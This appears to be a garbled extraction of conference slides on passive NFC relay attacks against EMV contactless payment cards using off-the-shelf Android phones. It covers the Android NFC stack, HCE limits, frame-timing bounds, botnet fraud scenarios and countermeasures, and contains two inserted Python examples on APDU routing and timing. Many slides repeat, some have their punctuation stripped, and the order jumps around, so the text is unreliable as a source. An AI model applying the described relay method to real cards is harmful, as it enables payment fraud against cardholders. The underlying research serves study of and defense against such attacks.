- https://android.googlesource.com/platform/frameworks/base/+/master/core/java/android/nfc
- https://android.googlesource.com/platform/packages/apps/Nfc/+/master/src/com/android/nfc
- https://android.googlesource.com/platform/packages/apps/Nfc/+/master/nci
- https://android.googlesource.com/platform/external/libnfc-nci/+/master/src
- http://nfc-forum.org/our-work/specifications-and-application-documents/specifications/nfc-controller-interface-nci-specifications
- http://www.cardsys.dk/download/NFC_Docs/NFC%20Controller%20Interface%20(NCI)%20Technical%20Specification.pdf
- http://www.datasheet4u.com/PDF/845670/BCM20793S.html
- http://www.datasheet4u.com/PDF/845671/BCM20793SKMLG.html

Android and NFC: A Tale of L♥ve (VI)
Some remarkable limitations

Limitation 1: dishonest verifier communicates with a MIFARE Classic
- libnfc-nci does not allow sending raw ISO/IEC 14443-3 commands
- Caused by the CRC computation performed by the NFCC
- Overcome if the NFCC is modified
- EMV contactless cards are IsoDep, fully ISO/IEC 14443-compliant

Limitation 2: dishonest prover communicates with an honest verifier
- Device in HCE mode: the AID must be known in advance
- Overcome if the device is rooted: the Xposed framework may help to overcome this issue, but needs root permissions

Android and NFC A Tale of Lrve (VI)Some remarkable limitations

Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands

Caused by the CRC computation performed by the NFCC

Overcome whether NFCC is modified

EMV contactless cards are IsoDep fully ISOIEC 14443-compliant

Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode

AID must be known in advance

Overcome whether device is rooted

Xposed framework may help to overcome this issue but needs rootpermissions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1

Distributed Mafia Fraud

BOT

BOTMASTER

BOT

BOT

BOT

BOT

BOT

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36

Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2

Hiding Fraud Locations

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36

Relay Attack Implementation (IV)Resistant Mechanisms

Brief summary of resistant mechanismsDistance-bounding protocols

Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages

Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands

Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36

Related WorkOn relay attacks

2005-2009 First works built on specific hardware

2010 Nokia mobile phones with NFC capability plus a Java MIDletapp

2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device

2014 Active relay attacks with custom hardware and customAndroid firmware

Several works studied delay upon relay channel

Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint

Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36


Introduction to NFC (III)

ISO/IEC 14443 standard: four-part international standard for contactless smartcards

1. Size, physical characteristics, etc.
2. RF power and signalling schemes (Type A & B); half-duplex, 106 kbps rate
3. Initialization + anticollision protocol
4. Data transmission protocol

IsoDep: cards compliant with the four parts. Example: contactless payment cards

Introduction to NFC (IV)

ISO/IEC 7816: fifteen-part international standard related to contacted integrated circuit cards, especially smartcards

Application Protocol Data Units (APDUs)

Introduction to NFC (V)

[Figure taken from "13.56 MHz RFID Proximity Antennas" (http://www.nxp.com/documents/application_note/AN78010.pdf)]


Introduction to NFC (VI)


Introduction to NFC (VII)

Ok. So is it secure, right? Right?

If it were so secure, you would not be staring at us

NFC security threats:

Eavesdropping: secure communication as solution

Data modification (i.e., alteration, insertion or destruction): feasible in theory (but requires quite advanced RF knowledge)

Relays: forwarding of wireless communication. Two types: passive (just forwards) or active (forwards and alters the data)

We focus on passive relay attacks


Introduction to NFC (VIII)

NFC brings "cards" to mobile devices. The payment sector is quite interested in this new way for making payments

500M NFC payment users expected by 2019

Almost 300 smart phones available at the moment with NFC capabilities. Check http://www.nfcworld.com/nfc-phones-list/

Most of them run Android OS

Research Hypothesis: Can a passive relay attack be performed in contactless payment cards using an Android NFC-capable device? If so, what are the constraints (whether any exist)?



Background (I): EMV contactless cards

Europay, Mastercard and VISA: standard for inter-operation of IC cards, Point-of-Sale terminals and automated teller machines

Authenticating credit and debit card transactions. Commands defined in ISO/IEC 7816-3 and ISO/IEC 7816-4 (http://en.wikipedia.org/wiki/EMV)

Application ID (AID) command

Background (II): MasterCard PayPass, VISA payWave and American Express ExpressPay

Are they secure?

Amount limit on a single transaction: up to £20 GBP, 20 €, US$50, 50 CHF, CAD$100 or AUD$100

cof, cof (http://www.bankinfosecurity.com/android-attack-exploits-visa-emv-flaw-a-7516/op-1)

Sequential contactless payments limited – it asks for the PIN

Protected by the same fraud guarantee as standard transactions (hopefully)


Background (III)

Relay attacks: "On Numbers and Games", J. H. Conway (1976)

Mafia frauds – Y. Desmedt (SecuriCom'88)

[Figure: P ⟶ V ... communication link ... P ⟶ V, i.e. the honest prover talks to the dishonest verifier, which forwards over the link to the dishonest prover facing the honest verifier]

Real-time fraud where a fraudulent prover P and verifier V cooperate

Honest prover and verifier: contactless card and Point-of-Sale terminal. Dishonest prover and verifier: two NFC-enabled Android devices



Android and NFC: A Tale of Love (I): Recap on evolution of Android NFC support

[Figure: timeline of NFC tag technologies and NFC operation modes supported per Android release]

Android 2.3.3 Gingerbread (API level 10): NfcA (ISO/IEC 14443-3A), NfcB (ISO/IEC 14443-3B), NfcF (JIS 6319-4), NfcV (ISO/IEC 15693), IsoDep (ISO/IEC 14443-4), Ndef, NdefFormatable, MifareClassic, MifareUltralight. Operation modes: reader/writer and peer-to-peer in software; card-emulation in hardware only

Android CyanogenMod OS 9.1: IsoPcdA (ISO/IEC 14443-4A), IsoPcdB (ISO/IEC 14443-4B), thanks to Doug Yeager

Android 4.2 Jelly Bean (API level 17): NfcBarcode

Android 4.4 KitKat (API level 19): card-emulation also in software (alongside reader/writer, peer-to-peer and hardware card-emulation); NfcAdapter.ReaderCallback added

Android and NFC: A Tale of Love (II): Digging into Android NFC stack

Event-driven framework, nice API support. Two native implementations (depending on built-in NFC chip): libnfc-nxp and libnfc-nci

NXP dropped in favour of NCI: open architecture, not focused on a single chip family; open interface between the NFC Controller and the DH (Device Host); standard proposed by NFC Forum


Android and NFC: A Tale of Love (III): Digging into Android NFC stack – Reader/Writer mode

Not allowed to be set directly → Android activity. Android NFC service selects apps according to the tag definition of the Manifest file

At low level, libnfc-nci uses a reliable mechanism of queues and message passing – General Kernel Interface (GKI). Makes communication between layers and modules easier

[Figure: transceive call path: User App → Tag (NFC developer framework) → NfcService, mTagService.transceive → IPC → TagService → DeviceHost.TagEndPoint <<realize>> NativeNfcTag → JNI doTransceive → NativeNfcTag.cpp (System NFC library) → libnfc-nci]

Android and NFC: A Tale of Love (IV): Digging into Android NFC stack – HCE mode

A service must be implemented to process commands and replies: HostApduService abstract class and processCommandApdu method

AID-based routing service table. This means you need to declare in advance what AID you handle

Android and NFC: A Tale of Love (V): Digging into Android NFC stack – Summary

Description | Language(s) | Dependency | OSS
NFC developer framework (com.android.nfc package) | Java, C++ | API level | Yes
System NFC library (libnfc-nxp or libnfc-nci) | C, C++ | Manufacturer | Yes
NFC Android kernel driver | C | Hardware and manufacturer | Yes
NFC firmware (/system/vendor/firmware directory) | ARM Thumb | Hardware and manufacturer | No

Some useful links:
https://android.googlesource.com/platform/frameworks/base/+/master/core/java/android/nfc
https://android.googlesource.com/platform/packages/apps/Nfc/+/master/src/com/android/nfc
https://android.googlesource.com/platform/packages/apps/Nfc/+/master/nci
https://android.googlesource.com/platform/external/libnfc-nci/+/master/src
http://nfc-forum.org/our-work/specifications-and-application-documents/specifications/nfc-controller-interface-nci-specifications
http://www.cardsys.dk/download/NFC_Docs/NFC%20Controller%20Interface%20(NCI)%20Technical%20Specification.pdf
http://www.datasheet4u.com/PDF/845670/BCM20793S.html
http://www.datasheet4u.com/PDF/845671/BCM20793SKMLG.html

Android and NFC: A Tale of Love (VI): Some remarkable limitations

Limitation 1: dishonest verifier communicates with a MIFARE Classic. libnfc-nci does not allow sending raw ISO/IEC 14443-3 commands, caused by the CRC computation performed by the NFCC. Overcome if the NFCC is modified. EMV contactless cards are IsoDep, fully ISO/IEC 14443-compliant

Limitation 2: dishonest prover communicates with an honest verifier. Device in HCE mode: AID must be known in advance. Overcome if the device is rooted. Xposed framework may help to overcome this issue, but needs root permissions
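The AID-declared-in-advance dispatch described on the HCE slide and in Limitation 2, as an added Python example that is not the authors' relay app: it parses ISO/IEC 7816-4 command APDUs and models an AID routing table in which only a registered AID can be SELECTed, with later commands going to the selected service. The AID F0010203040506, the FCI and the record it answers with are constructed sample values.

```python
"""ISO/IEC 7816-4 command APDU parsing and AID-based routing.

Added example, not code from the authors' relay app: it models the
HostApduService / processCommandApdu dispatch the slides describe, so that
the reader can see why a host-card-emulation service must declare its AID
before the first SELECT arrives. Every AID, APDU and record below is a
constructed sample value, not taken from a real card.
"""

# ISO/IEC 7816-4 status words (real values)
SW_OK = bytes.fromhex("9000")
SW_FILE_NOT_FOUND = bytes.fromhex("6A82")   # no application/record for the request
SW_INS_NOT_SUPPORTED = bytes.fromhex("6D00")


def parse_apdu(apdu: bytes) -> dict:
    """Split a short-form command APDU into CLA, INS, P1, P2, data and Le."""
    if len(apdu) < 4:
        raise ValueError("APDU shorter than the 4-byte header")
    cla, ins, p1, p2 = apdu[:4]
    body = apdu[4:]
    data, le = b"", None
    if len(body) == 1:                      # case 2: Le only
        le = body[0] or 256                 # Le = 0x00 means 256 bytes
    elif len(body) > 1:                     # case 3 or 4: Lc, data[, Le]
        lc = body[0]
        if lc == 0 or len(body) - 1 < lc:
            raise ValueError("Lc does not match the data length")
        data = body[1:1 + lc]
        rest = body[1 + lc:]
        if len(rest) > 1:
            raise ValueError("trailing bytes after Le")
        if rest:
            le = rest[0] or 256
    return {"cla": cla, "ins": ins, "p1": p1, "p2": p2, "data": data, "le": le}


def select_aid(apdu: bytes):
    """Return the AID if this is a SELECT by DF name (CLA=00 INS=A4 P1=04), else None."""
    f = parse_apdu(apdu)
    if (f["cla"], f["ins"], f["p1"]) == (0x00, 0xA4, 0x04) and f["data"]:
        return f["data"]
    return None


class AidRouter:
    """Minimal model of the AID routing table: services register an AID in
    advance; a SELECT for an unregistered AID is not delivered to any service."""

    def __init__(self):
        self._services = {}      # AID bytes -> handler(apdu_fields) -> response bytes
        self._selected = None    # handler of the currently selected application

    def register(self, aid_hex: str, handler):
        self._services[bytes.fromhex(aid_hex)] = handler

    def process_command_apdu(self, apdu: bytes) -> bytes:
        aid = select_aid(apdu)
        if aid is not None:
            handler = self._services.get(aid)
            if handler is None:             # unknown AID: nothing to route to
                self._selected = None
                return SW_FILE_NOT_FOUND
            self._selected = handler
        if self._selected is None:          # no application selected yet
            return SW_FILE_NOT_FOUND
        return self._selected(parse_apdu(apdu))


# Constructed sample application (AID in the proprietary F0... range, not a real scheme AID)
SAMPLE_AID = "F0010203040506"
SAMPLE_RECORD = bytes.fromhex("70045A020102")   # constructed record template


def sample_service(f: dict) -> bytes:
    """Handler standing in for a HostApduService: SELECT and READ RECORD only."""
    if f["ins"] == 0xA4:                    # SELECT: answer with a constructed FCI
        aid = bytes.fromhex(SAMPLE_AID)
        fci = b"\x6F" + bytes([len(aid) + 2]) + b"\x84" + bytes([len(aid)]) + aid
        return fci + SW_OK
    if f["ins"] == 0xB2:                    # READ RECORD
        return SAMPLE_RECORD + SW_OK
    return SW_INS_NOT_SUPPORTED


def build_router() -> AidRouter:
    router = AidRouter()
    router.register(SAMPLE_AID, sample_service)
    return router


if __name__ == "__main__":
    r = build_router()
    for hex_apdu in ("00B2010C00", "00A4040007F001020304050600", "00B2010C00",
                     "00A4040007F0FFFFFFFFFFFF00", "00B2010C00"):
        print(hex_apdu, "->", r.process_command_apdu(bytes.fromhex(hex_apdu)).hex().upper())
```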


Android and NFC: A Tale of Love (V): Some remarkable limitations and remarks

Limitation 3: dishonest prover and dishonest verifier communicate through a non-reliable peer-to-peer relay channel. ISO/IEC 14443-4 defines the Frame Waiting Time as FWT = 256 · (16 / fc) · 2^FWI, 0 ≤ FWI ≤ 14, where fc = 13.56 MHz

FWT ∈ [500 µs, 5 s] → relay is theoretically possible when delay is ≤ 5 s

Concluding Remarks: any NFC-enabled device running OTS Android ≥ 4.4 can perform an NFC passive relay attack at APDU level when the specific AID of the honest prover is known and an explicit SELECT is performed

Any communication involving an APDU-compliant NFC tag (i.e., MIFARE DESFire EV1, Inside MicroPass or Infineon SLE66CL) can also be relayed

And now, let's move to the practice



Relay Attack Implementation (I): Experiment configuration

PoS device: Ingenico IWL280 with GPRS + NFC support

Android app developed (±2000 LOC). Two OTS Android NFC-capable devices

One constraint: only the dishonest prover must run Android ≥ 4.4


Relay Attack Implementation (II): Threat Scenarios – Scenario 1

Distributed Mafia Fraud

[Figure: a botmaster coordinating several bots]

Relay Attack Implementation (III): Threat Scenarios – Scenario 2

Hiding Fraud Locations

Relay Attack Implementation (IV): Resistant Mechanisms

Brief summary of resistant mechanisms:

Distance-bounding protocols: upper bounding the physical distance using the Round-Trip-Time of cryptographic challenge-response messages

Timing constraints: not enforced in current NFC-capable systems; the protocol itself allows timing extension commands

Physical countermeasures: whitelisting/blacklisting (random UID in HCE mode → unfeasible); RFID blocking covers; physical button/switch activation; secondary authentication methods (e.g., on-card fingerprint scanners)
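The FWT formula from Limitation 3 and the timing-constraint point on the Resistant Mechanisms slide, worked through in an added Python example that is not part of the original slides: it evaluates FWT over the whole FWI range, finds the smallest FWI that still covers a given exchange delay, and checks whether a card's turnaround plus a relay channel's round trip fits inside FWT, with the protocol's S(WTX) timing extension switching that limit off. The 8 ms and 120 ms latencies used are constructed sample values.

```python
"""ISO/IEC 14443-4 Frame Waiting Time (FWT) versus relay-channel delay.

Added example (not the authors' code): evaluates FWT = 256 * (16 / fc) * 2**FWI
with fc = 13.56 MHz and 0 <= FWI <= 14, as given on the "Limitation 3" slide,
and checks whether a relayed exchange fits inside that window. The latencies
used at the bottom are constructed sample values, not measurements from the talk.
"""
from typing import Optional

FC_HZ = 13.56e6           # ISO/IEC 14443 carrier frequency fc
FWI_MIN, FWI_MAX = 0, 14  # allowed Frame Waiting Integer range


def fwt_seconds(fwi: int) -> float:
    """Frame Waiting Time in seconds for a given FWI (ISO/IEC 14443-4 formula)."""
    if not FWI_MIN <= fwi <= FWI_MAX:
        raise ValueError("FWI must be in [0, 14]")
    return 256 * (16 / FC_HZ) * 2 ** fwi


def fwt_bounds() -> tuple:
    """(min, max) FWT over the FWI range: the formula gives about 302 us at
    FWI=0 and about 4.95 s at FWI=14."""
    return fwt_seconds(FWI_MIN), fwt_seconds(FWI_MAX)


def smallest_fwi_for(delay_s: float) -> Optional[int]:
    """Smallest FWI whose FWT still covers delay_s, or None if even FWI=14 is too short.

    Read from the defender's side: the tighter the FWI a terminal announces, the
    less room a relay channel has, but the FWT must still cover genuine cards."""
    for fwi in range(FWI_MIN, FWI_MAX + 1):
        if fwt_seconds(fwi) >= delay_s:
            return fwi
    return None


def within_fwt(fwi: int, card_turnaround_s: float, channel_rtt_s: float,
               wtx_allowed: bool) -> bool:
    """Does the card's own turnaround plus the channel round trip fit inside FWT?

    If the reader honours the protocol's timing-extension request (S(WTX)), as the
    "Resistant Mechanisms" slide notes, the FWT limit no longer bounds the delay."""
    if wtx_allowed:
        return True
    return card_turnaround_s + channel_rtt_s <= fwt_seconds(fwi)


if __name__ == "__main__":
    lo, hi = fwt_bounds()
    print(f"FWT range: {lo * 1e6:.1f} us .. {hi:.3f} s")
    # Constructed sample: 8 ms card turnaround plus 120 ms channel round trip
    card, channel = 0.008, 0.120
    print("smallest FWI covering the exchange:", smallest_fwi_for(card + channel))
    for fwi in (4, 8, 14):
        print(f"FWI={fwi:2d} FWT={fwt_seconds(fwi) * 1e3:8.2f} ms "
              f"fits without WTX: {within_fwt(fwi, card, channel, wtx_allowed=False)}")
```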


Related Work: On relay attacks

2005–2009: first works, built on specific hardware

2010: Nokia mobile phones with NFC capability plus a Java MIDlet app

2012–2013: relay attacks on Android accessing Secure Elements. A SE securely stores data associated with credit/debit cards. Needs a non-OTS Android device

2014: active relay attacks with custom hardware and custom Android firmware

Several works studied the delay upon the relay channel. Relay over long distances is feasible → latency isn't a hard constraint

Ask us for specific references: too many names for a single slide



Relay Attacks in EMV Contactless Cardswith Android OTS Devices

Jose Viladagger Ricardo J RodrıguezDagger

pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed

daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity

University of Zaragoza Spain University of Leon Spain

May 28 2015

Hack in the Box 2015Amsterdam (Nederland)

  • Introduction
  • Background
    • EMV Contactless Cards
    • Relay Attacks and Mafia Frauds
      • Android and NFC A Tale of Lve
        • Evolution of NFC Support in Android
        • Practical Implementation Alternatives in Android
          • Relay Attack Implementation
            • Demo experiment
            • Threat Scenarios
            • Resistant Mechanisms
              • Related Work
              • Conclusions
Page 9: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Introduction to NFC (IV)

ISOIEC 7816Fifteen-part international standard related to contacted integratedcircuit cards especially smartcards

Application Protocol Data Units (APDUs)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 8 36

Introduction to NFC (V)

[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36

Introduction to NFC (V)

[Taken from 1356 MHz RFID Proximity Antennas (httpwwwnxpcomdocumentsapplication_noteAN78010pdf)]

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 9 36

Introduction to NFC (VI)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 10 36

Introduction to NFC (VII)

Ok So is it secure right Right

If it were so secure you would not be staring at us uml

NFC security threatsEavesdropping

Secure communication as solution

Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)

RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)

We focus on passive relay attacks

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36

Introduction to NFC (VII)

Ok So is it secure right RightIf it were so secure you would not be staring at us uml

NFC security threatsEavesdropping

Secure communication as solution

Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)

RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)

We focus on passive relay attacks

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36

Introduction to NFC (VII)

Ok So is it secure right RightIf it were so secure you would not be staring at us uml

NFC security threatsEavesdropping

Secure communication as solution

Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)

RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)

We focus on passive relay attacks

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36

Introduction to NFC (VII)

Ok So is it secure right RightIf it were so secure you would not be staring at us uml

NFC security threatsEavesdropping

Secure communication as solution

Data modification (ie alteration insertion or destruction)Feasible in theory (but requires quite advanced RF knowledge)

RelaysForwarding of wireless communicationTwo types passive (just forwards) or active (forwards and alters thedata)

We focus on passive relay attacks

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 11 36

Introduction to NFC (VIII)

NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments

500M NFC payment users expected by 2019

Almost 300 smart phones available at themoment with NFC capabilities

Check httpwwwnfcworldcomnfc-phones-list

Most of them runs Android OS

Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device

If so what are the constraints (whether any exists)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36

Introduction to NFC (VIII)

NFC brings ldquocardsrdquo to mobile devicesPayment sector is quite interested in this newway for making payments

500M NFC payment users expected by 2019

Almost 300 smart phones available at themoment with NFC capabilities

Check httpwwwnfcworldcomnfc-phones-list

Most of them runs Android OS

Research HypothesisCan a passive relay attack be performed in contactless paymentcards using an Android NFC-capable device

If so what are the constraints (whether any exists)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 12 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 13 36

Background (I)EMV contactless cards

Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines

Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)

Application ID (AID) command

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36

Background (II): MasterCard PayPass, VISA payWave and American Express ExpressPay

Are they secure?

Amount limit on a single transaction: up to £20 GBP, 20 €, US$50, 50 CHF, CAD$100 or AUD$100.

Cough, cough (http://www.bankinfosecurity.com/android-attack-exploits-visa-emv-flaw-a-7516/op-1)

Sequential contactless payments are limited: after a few, the terminal asks for the PIN.

